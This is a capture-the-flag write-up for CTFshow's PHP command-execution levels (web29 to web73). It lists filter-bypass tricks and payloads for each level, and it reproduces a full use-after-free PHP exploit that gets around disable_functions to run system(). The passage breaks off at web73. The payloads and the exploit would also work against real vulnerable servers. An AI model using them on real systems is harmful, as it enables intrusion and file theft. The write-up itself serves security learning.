CTFshow-web entry-command execution

command execution

backtick ``

Backticks `` perform command substitution: the shell runs the command inside the backticks first, holds its output, and substitutes that output where the backticks appear.

single quotes, double quotes

Applicable when a keyword is filtered.
Placed inside a shell command (ca''t, c"a"t), the empty quotes break the keyword up so the regex no longer matches, while the shell still joins the pieces and runs the original command.

space bypass

> < <> redirection operators (nl<flag.php feeds the file on stdin, no space needed)
%09, the URL-encoded tab (needs PHP, or another web layer, to decode it before the shell sees it; the shell treats tab as whitespace)
${IFS}
$IFS$9 ($9 is an unset positional parameter, so it expands to nothing and merely ends the variable name)
{cat,flag.php} // the comma plays the role of the space; this is bash brace expansion and fails when /bin/sh is dash, as on Debian/Ubuntu
%20, the URL-encoded space (PHP decodes it to a real space before preg_match() runs, so it only helps when the filter inspects the raw URL)

Read file bypass (cat bypass)

Applicable when cat is filtered.
(1) more: displays the file one page at a time
(2) less: like more, but allows paging back and forth with PgUp/PgDn
(3) head: shows the first few lines
(4) tac: prints the file starting from the last line; tac is cat reversed
(5) tail: shows the last few lines
(6) nl: prints the file with line numbers
(7) od: dumps the file contents in octal/hex/binary form
(8) vi: an editor, which can also be used to view the file
(9) vim: an editor, likewise usable for viewing
(10) sort: also prints the file (sorted)
(11) uniq: also prints the file
(12) file -f: treats each line of the file as a filename and leaks the lines in its error messages
grep: grep test *file   # search the files in the current directory whose names end in "file" for the string "test" and print the matching lines

Linux wildcard bypass

Applicable when flag is filtered but ? and * are not.
Linux shells support a set of wildcards (globs):

*      matches any string, including the empty string (zero or more characters), e.g. ls file*
?      matches exactly one character (when not inside brackets), e.g. ls file? matches file0
[abcd] matches any one of the characters a, b, c, d
[a-z]  matches any one character in the range a to z; in general [] matches any single character listed inside the brackets, e.g. ls file[0-9] matches file0
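The three bypass families above (space, cat, keyword wildcards) can be checked offline before they are sent at a target. The script below is an added example, not code from the original writeup: it plants a throwaway flag.php holding a constructed flag string, runs each payload through `sh -c` the way PHP's system() does, and reports which ones leak the flag. It also probes whether `{cat,flag.php}` works at all on the host's /bin/sh, since brace expansion is a bash feature that dash lacks.

```shell
#!/bin/sh
# Added example, not from the original writeup: try the space / cat / wildcard
# bypasses against a throwaway flag.php, running each payload through `sh -c`
# exactly the way PHP's system() does, and report which ones leak the flag.

FLAG='ctfshow{constructed_sample_flag}'   # constructed value, not a real flag
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
printf '<?php\n$flag="%s";\n' "$FLAG" > "$WORKDIR/flag.php"

# run_payload PAYLOAD: execute PAYLOAD inside WORKDIR as system($c) would.
run_payload() {
    (cd "$WORKDIR" && sh -c "$1" 2>/dev/null)
}

# leaked PAYLOAD: exit 0 when the payload's output contains the flag.
leaked() {
    run_payload "$1" | grep -qF -- "$FLAG"
}

# brace_expansion_works: {cat,flag.php} needs bash. Debian/Ubuntu ship dash as
# /bin/sh, which passes the braces through literally, so the trick fails there.
brace_expansion_works() {
    [ "$(sh -c 'echo {a,b}')" = "a b" ]
}

# report PAYLOAD: print one line per payload with the verdict.
report() {
    if leaked "$1"; then
        printf 'leaks   %s\n' "$1"
    else
        printf 'blocked %s\n' "$1"
    fi
}

# Payloads as they arrive in ?c= after URL decoding. Each one avoids a plain
# space, the literal word "flag", and (where noted) the word "cat".
report 'tac${IFS}fla?.php'      # ${IFS} for the space, ? for the g, tac for cat
report 'nl$IFS$9fla?.php'       # $9 is unset: ends the variable name, expands to nothing
report "nl<fla''g.php"          # < feeds the file on stdin; '' splits the keyword
report "ta''c\${IFS}f???.php"   # the same '' split applied to the command name
report 'tac fla?.php'           # baseline with a real space: no bypass, just shows the harness works
report '{tac,fla?.php}'         # brace expansion: depends on what /bin/sh is
if brace_expansion_works; then
    echo '/bin/sh expands braces: {cmd,arg} is usable on this host'
else
    echo '/bin/sh does not expand braces: {cmd,arg} would fail on this host'
fi
```

The harness applies no filter of its own, so it answers "does this payload still execute and leak?", not "does it pass the regex?"; pair it with the level's preg_match() for the second question.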

The cooperation of include and pseudo-protocol

Because include() executes a PHP file rather than displaying it, we combine it with the php://filter pseudo-protocol to base64-encode flag.php and print it; the file name goes in a second parameter, which the filter never inspects.

web29

Topic: the challenge source is shown as a screenshot in the original post.
Solution
List the directory. Since "flag" is filtered, use a wildcard to bypass it and view flag.php; then copy flag.php to 1.txt and open 1.txt to read the flag.

web30

Topic: shown as a screenshot in the original post.
Solution
flag, system and php are filtered.
Use backticks to list the directory and read flag.php; the filtered words flag and php are bypassed with wildcards.

web31

Topic: shown as a screenshot in the original post.
Solution
Dots, single quotes and spaces are filtered as well. The filter only inspects c, so call eval() on a second GET parameter and put the real command there; nothing in that second parameter is checked.
Payload:

c=eval($_GET[1]);&1=echo `nl flag.php `;

web32

Topic: shown as a screenshot in the original post.
Solution
Parentheses and semicolons are filtered. %0a is a newline, which separates include from its argument; include does not need parentheses, and the closing ?> tag ends the statement in place of the semicolon.
Payload:

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Base64-decode the page output to recover flag.php.

web33

Topic: shown as a screenshot in the original post.
Solution
This level also filters double quotes; require works the same way as include.
Payload:

c=require$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web34

Problem: shown as a screenshot in the original post.
Solution
More characters are filtered, but the previous method still works.
Payload:

c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web35


Topic: shown as a screenshot in the original post.
Solution
< is filtered as well; the previous method still works.
Payload:

c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web36

Topic: shown as a screenshot in the original post.
Solution
Digits are filtered now. The previous method still works; just rename the second parameter from 1 to a letter.
Payload:

c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

web37

Topic: shown as a screenshot in the original post.
Solution
The parameter is passed to include, and flag is filtered. Use the data:// pseudo-protocol to supply PHP code inline, with a ? wildcard standing in for the filtered letter.
Payload:

c=data://text/plain,<?php system('tac fla?.php');?>

web38

Topic: shown as a screenshot in the original post.
Solution
php is filtered as well. When PHP parses a file it looks for

<?php ... ?>

tags and only executes the code between them; everything outside the tags is passed through untouched.
Example:

<?php
echo "Hello PHP !";
?>

Output:
Hello PHP !
For echo() there is a shortcut: the same example can be written with the <?= tag:

<?= "Hello PHP !"?>

Explanation: <?= is a PHP short open tag equivalent to <?php echo, so it lets us execute code without the string "php" appearing in the payload. The second payload below hides both php and flag inside base64, which the filter does not decode.
Payloads:

c=data://text/plain,<?=system('tac fl*');?>
c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

The base64 string decodes to <?php system('cat flag.php');?>.

web39

Topic: shown as a screenshot in the original post.
Solution
The same data:// approach works here.
Payloads:

c=data://text/plain,<?php echo `tac fl*`?>
c=data://text/plain,<?= system('tac fl*');?>

web40

Problem: shown as a screenshot in the original post.
Solution
Many symbols are filtered, and the hint points at a parameterless payload (every function is called only on the return value of another):

c=show_source(next(array_reverse(scandir(pos(localeconv())))));

1. localeconv(): returns an array of locale numeric and monetary formatting information; its first element is the decimal point, ".".
2. pos(): returns the current element of an array; with the pointer at the start, that is "." here.
3. scandir("."): lists the files in the current directory, sorted in ascending order, e.g. [".", "..", "flag.php", "index.php"].
4. array_reverse(): reverses the array, giving ["index.php", "flag.php", "..", "."].
5. next(): advances the internal pointer to the next element and returns it, which in that layout is "flag.php".
6. show_source(): syntax-highlights a file; it is an alias of highlight_file().
7. print_r(scandir('.')): lists all file names in the current directory, useful to confirm the order before building the chain.
8. current(): returns the current element of an array (the first, by default); pos is an alias of current.

No-parameter file reading

1. print_r() prints a variable in human-readable form.
2. get_defined_vars() returns an array of all defined variables, including superglobals such as $_POST.

Print all variables with print_r(get_defined_vars()); send the real code in a POST parameter; walk to the $_POST array with next(); print it to confirm, then execute its value. (The original shows each step as a screenshot.)

web41

Topic: shown as a screenshot in the original post.
Solution
See the referenced writeup for web41 (linked in the original post).

web42

Problem: shown as a screenshot in the original post.
Solution

The source appends >/dev/null 2>&1 to our command, which sends all of its output to the null device so nothing is echoed. To get output anyway, separate our command from the appended redirection with a list operator, so the redirection binds to something else.

;   // run both commands, one after the other
|   // pipe: both run, the first's output feeds the second, only the second's output is shown
||  // run the second only if the first fails
&   // run the first in the background, then the second; both run
&&  // run the second only if the first succeeds

Payload:

c=tac flag.php;

1: > redirects output somewhere, for example echo "123" > /home/123.txt
2: /dev/null is the null device file
3: 2> redirects stderr (file descriptor 2)
4: & in 2>&1 means "the same place as": stderr goes wherever stdout currently points
5: 1 is stdout and is the default, so ">/dev/null" equals "1>/dev/null"; therefore ">/dev/null 2>&1" can also be written "1>/dev/null 2>&1"

?c=tac flag.php;ls
The command before ; runs and its output is returned; the redirection applies only to the command after it (ls), whose output goes to /dev/null.
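The binding rule above is easy to get wrong for | versus ||. The script below is an added example, not from the original writeup: it models the web42 sink system($c." >/dev/null 2>&1") with a throwaway flag.php and a constructed flag string, and checks which list operators let the output escape the appended redirection.

```shell
#!/bin/sh
# Added example, not from the original writeup: model the web42 sink
#   system($c." >/dev/null 2>&1");
# and show which separators let our command's output escape the redirection.

FLAG='ctfshow{constructed_sample_flag}'   # constructed value, not a real flag
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
printf '<?php\n$flag="%s";\n' "$FLAG" > "$WORKDIR/flag.php"

# sink PAYLOAD: what the server runs, with the appended redirection.
sink() {
    (cd "$WORKDIR" && sh -c "$1 >/dev/null 2>&1" 2>/dev/null)
}

# escapes PAYLOAD: exit 0 when the flag still reaches stdout despite the sink.
escapes() {
    sink "$1" | grep -qF -- "$FLAG"
}

# Redirections bind to the simple command they follow, so everything before the
# separator keeps its own stdout:
#   tac flag.php        no separator: tac itself is silenced
#   tac flag.php;       the (empty) command after ; takes the redirection
#   tac flag.php;ls     ls is silenced, tac is not
#   tac flag.php||      || leaves an empty command, which legally carries the
#                       redirection on its own and never runs because tac succeeded
#   tac flag.php&&      && runs the redirected empty command after tac: still leaks
#   tac flag.php|       the pipe feeds tac's output INTO the silenced side: lost
for p in 'tac flag.php' 'tac flag.php;' 'tac flag.php;ls' 'tac flag.php||' 'tac flag.php&&' 'tac flag.php|'; do
    if escapes "$p"; then
        printf 'leaks    %s\n' "$p"
    else
        printf 'silenced %s\n' "$p"
    fi
done
```

The same model explains web43 onwards, where ; is filtered and || takes over the job of separating the command from the redirection.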

web43

Topic: shown as a screenshot in the original post.
Solution
In addition, ; and cat are filtered; || separates our command from the redirection instead.
Payloads:

c=cp flag.php 1.txt||
c=nl flag.php||
c=tac flag.php||

web44

Topic: shown as a screenshot in the original post.

Solution
The file name is now written with a wildcard.
Payloads:

c=tac fl*.php||
c=cp fl*.php 1.txt||

web45

Topic: shown as a screenshot in the original post.

Solution
%09 is the URL-encoded tab; the shell treats it as whitespace, so it replaces the space.
Payload:

c=tac%09fl*.php||

web46

Problem: shown as a screenshot in the original post.
Solution
Digits are filtered now; %09 (tab) contains no digit, so it still works, and ? stands in for the wildcard.
Payloads:

c=tac%09fla?.php||
c=nl<fla''g.php||

web47

Topic: shown as a screenshot in the original post.

Solution
The previous level's payload still works.
Payload:

c=tac%09fla?.php||

web48

Topic: shown as a screenshot in the original post.
Solution
Payload:

c=tac%09fla?.php||

web49

Topic: shown as a screenshot in the original post.
Solution
Payloads:

c=tac%09fla?.php||
c=nl<fla''g.php||

web50

Topic: shown as a screenshot in the original post.
Solution
Payload:

c=nl<fla''g.php||

web51

Topic: shown as a screenshot in the original post.
Solution
Payload:

c=nl<fla''g.php||

web52

Topic: shown as a screenshot in the original post.
Solution
Rename flag.php:

c=mv${IFS}fla?.php${IFS}a.txt

Visiting a.txt gives

$flag="flag_here";

which is obviously a decoy. Check the root directory, where a flag file turns up:

c=ls${IFS}/||ls

Check the working directory:

c=pwd||ls

Copy the flag from the root directory into the web root:

c=cp${IFS}/fla?${IFS}/var/www/html/b.txt||ls

Visit b.txt to get the flag. Alternatively, read it in place:

c=nl$IFS/fla''g||

web53

Topic

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

Solution
$ is allowed again, so the old method works: ${IFS} for the space, '' to split the filtered tac, ? for the filtered flag.
Payload:

c=ta''c${IFS}fla?.php

web54

Topic

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

Solution
The keyword patterns are now of the form .*c.*a.*t.*, which match the letters in order with anything in between (and case-insensitively, so the letters of ${IFS} count too), so splitting a word with '' no longer helps, and cat, tac, nl, cut, rm and the rest are all gone. mv is not on the list: list the directory, rename flag.php with wildcards, and visit a.txt.

c=mv${IFS}f???.php${IFS}a.txt

Visit a.txt for the flag.

web55

Topic

<?php
// Are you showing off?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

Solution
Every letter is filtered (the /i flag makes [a-z] cover upper case as well), so both the command and the file name have to be spelled with wildcards and digits.

Solution one

The /bin directory

bin is short for binary; it holds essential system executables such as cat, cp, chmod, df, dmesg, gzip, kill, ls, mkdir, more, mount, rm, su, tar and base64.
The 64 in base64 gives us digits to anchor a wildcard on: /???/????64 expands to /bin/base64, and ????.??? expands to flag.php. The space is not filtered at this level, so %20 is simply a space.

Payload:

c=/???/????64%20????.???

The page returns flag.php base64-encoded; decode it to read the flag. Make sure the glob matches only one path: if /???/????64 also hits something like a /usr/lib64 directory, the shell passes both matches to base64 and it fails with "extra operand".

Solution two

The /usr/bin directory

It mainly holds executables of application software, such as c++, g++, gcc, chdrv, diff, dig, du, eject, elm, free, gnome*, zip, htpasswd, kfm, ktop, last, less, locale, m4, make, man, mcopy, ncftp, newaliases, nslookup, passwd, quota, smb*, wget and so on.
We can use bzip2 under /usr/bin: compress flag.php first, then download the archive.
Payload:

First ?c=/???/???/????2 ????.???
then append /flag.php.bz2 to the URL to download the file.

Note that bzip2 without -k replaces flag.php with flag.php.bz2, so the original file is gone afterwards.

Solution three

Improved non-alphanumeric webshell: execute an uploaded script through the shell.
Whenever PHP receives a multipart file upload, it saves the file in the temporary directory for the duration of the request (it is deleted when the request ends). The default name is /tmp/phpXXXXXX, where the last six characters are random upper- and lower-case letters and digits.
Write a POST upload form:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST packet POC</title>
</head>
<body>
<form action="http://99da1d95-7eb6-468a-b044-cf1b1b5b393d.challenge.ctf.show/" method="post" enctype="multipart/form-data">
    <!-- target URL -->
    <label for="file">File:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

Construct the POC
Note: the uploaded shell script starts with "#!/bin/sh", which means the script is interpreted by /bin/sh; #! is the special marker followed by the path of the interpreter. (The original shows the script contents as a screenshot.)

?c=. /???/????????[@-[]

Here . (dot) is the shell's source command, /???/???????? matches /tmp/phpXXXXXX, and [@-[] is a character range covering @, A to Z and [, so the glob hits the temp file whenever its last random character is an upper-case letter. The upload and the c parameter must travel in the same request, because the temp file only exists while that request runs; retry until the random suffix matches.
Then visit flag.php.

web56

Topic

<?php
// Are you showing off?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

Solution:
A few more symbols are filtered ($, (, {, ' and "), but the web55 methods use none of them, so they still work. (The original shows the result as a screenshot.)

web57

Topic

<?php
// Can you still show off?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

Solution
The flag is in 36.php, and c is spliced into cat <c>.php, so all we need is the number 36 written without letters or digits. Shell arithmetic $(( )) does it:
$(()) with an empty expression evaluates to 0; ~0 (bitwise NOT) is -1; adding 37 copies of -1 gives -37 (36 copies would give -36, whose complement is 35); ~(-37) is 36.
Payload:

c=$((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))

web58

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
Some functions are disabled. Use scandir to list the directory:

c=print_r(scandir(current(localeconv())));

Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=echo file_get_contents('flag.php');
c=show_source('flag.php');
c=highlight_file("flag.php");
c=print_r(file('flag.php'));

web59

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
Some functions are disabled. List the directory:

c=print_r(scandir(current(localeconv())));

Payloads:

c=show_source(next(array_reverse((scandir(current(localeconv()))))));
c=show_source('flag.php');

include also works (shown as a screenshot in the original).

web60

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
The previous payloads still work, although some more functions are disabled.
Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');

(The original shows the output and the list of disabled functions as screenshots.)

web61

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
The previous level's payloads still work.
Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');

web62

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
Still the same payloads.
Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=show_source('flag.php');
c=highlight_file('flag.php');

web63

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
The previous level's payloads still work.
Payloads:

c=include('flag.php');echo $flag;
c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');

web64

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution

var_dump() prints information about a variable.
get_defined_vars() returns an array of all defined variables.

var_dump(get_defined_vars()) therefore lists every variable in scope. Including flag.php defines $flag, so include it first and dump all variables.
Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');
c=include('flag.php');var_dump(get_defined_vars());

web65

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
Still possible with the same payloads.
Payloads:

c=show_source(next(array_reverse(scandir(current(localeconv())))));
c=highlight_file('flag.php');
c=show_source('flag.php');
c=include('flag.php');var_dump(get_defined_vars());

web66

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
The previous payloads no longer work, and show_source is disabled. Check the root directory:

c=print_r(scandir('/'));

The flag is in the root directory.
Payload:

c=highlight_file('/flag.txt');

web67

Topic

<?php
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

Solution
Payload:

c=highlight_file('/flag.txt');

web68-70

Topic: shown as a screenshot in the original post.
Solution
Check the root directory; the flag is still there:

c=var_dump(scandir('/'));

highlight_file() is disabled too, so include the file directly: a file with no <?php tags is simply output as text.
Payload:

c=include('/flag.txt');

web71

Title
The source is provided as an attachment below the challenge:

<?php
error_reporting(0);
ini_set('display_errors', 0);
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

Solution
Executing var_dump('/'); returns

???????: ?????_?????????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_???() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.???(??) : ????()'? ???? ?? ???? ? 你要上天吗?

$s = ob_get_contents(); // read the data currently held in the output buffer
ob_end_clean(); // discard the buffer contents and close the buffer without outputting them
ob_get_contents() copies the internal buffer into a string; ob_end_flush() would output what is stored there; ob_end_clean() silently discards it.
So after eval() runs, the script reads the buffered output into $s, clears the buffer, and prints $s with every letter and digit replaced by "?".
That replacement only happens once eval() returns. Calling exit() inside our code terminates the script first, and PHP flushes any still-open output buffer at shutdown, so the real content is printed unmodified.
Payload:

c=include('/flag.txt');exit();

web72

The source is the same as the previous level:

<?php
error_reporting(0);
ini_set('display_errors', 0);
// Are you showing off?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

Solution
The previous payload reports that the file cannot be found, so check the root directory:

c=var_dump(scandir('/'));exit();

The listing is restricted by open_basedir, and ini_set() is not allowed to loosen it. The glob:// stream wrapper can still enumerate directories outside the allowed path; listing the root with it shows a flag0.txt:

c=$a = "glob:///*.txt";
if ( $b = opendir($a) ) {
        while ( ($file = readdir($b)) !== false ) {
                echo "filename:".$file."\n";
        }
        closedir($b);
}
exit();

Including /flag0.txt directly, however, fails: open_basedir reports the file is not within the allowed path(s).
The group owner provided the use-after-free script below, which bypasses disable_functions and reads the file through system() instead of PHP's file APIs. Vuln::__destruct() unsets $this->a while the exception backtrace still references it, leaving a dangling string that the script turns into an arbitrary read/write primitive; from there it finds the PHP binary's base address, parses the ELF program headers to locate the basic_functions table, looks up zif_system, copies a Closure object into controlled memory and overwrites the copy's handler with zif_system, so that calling $helper->b($cmd) runs system($cmd). It only works on PHP builds that still have that bug, and the whole script must be URL-encoded when sent as c.

<?php

function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() {
            global $backtrace;
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    // read a little-endian integer of $s bytes out of $str at offset $p
    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    // pack an integer as a little-endian string of $m bytes
    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    // overwrite $n bytes of $str at offset $p with the little-endian value $v
    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    // arbitrary read: point the fake zend_string behind $helper->a at $addr
    // and read the target memory back through strlen()
    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) {
            $leak %= 2 << ($s * 8) - 1;
        }
        return $leak;
    }

    // walk the ELF program headers to find the .data (RW) and .text (RX) segments
    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) {
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) {
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    // scan .data for the basic_functions table: the entries "constant" and,
    // four slots later, "bin2hex" identify it
    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                if($deref != 0x746e6174736e6f63)   // "constant"
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                if($deref != 0x786568326e6962)     // "bin2hex"
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    // page-align the leaked pointer and walk backwards until the ELF magic appears
    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {        // "\x7fELF" + 64-bit, little-endian, v1
                return $addr;
            }
        }
    }

    // walk the function table until the entry named "system" and return its handler
    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {      // "system"
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    // the destructor frees $vuln->a while the backtrace still holds it
    function trigger_uaf($arg) {
        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    // heap grooming: allocate a run of same-sized strings first
    $n_alloc = 10;
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];   // dangling reference to the freed string

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    // copy the real Closure object into our buffer, then patch the copy
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4);          // internal function type
    write($abc, 0xd0 + 0x68, $zif_system);   // handler = zif_system

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();   // URL-encode the whole script before sending it as c
?>

web73

Topic: not reproduced in the original post.

Solution
var_dump() is disabled; iterate over the listing instead:

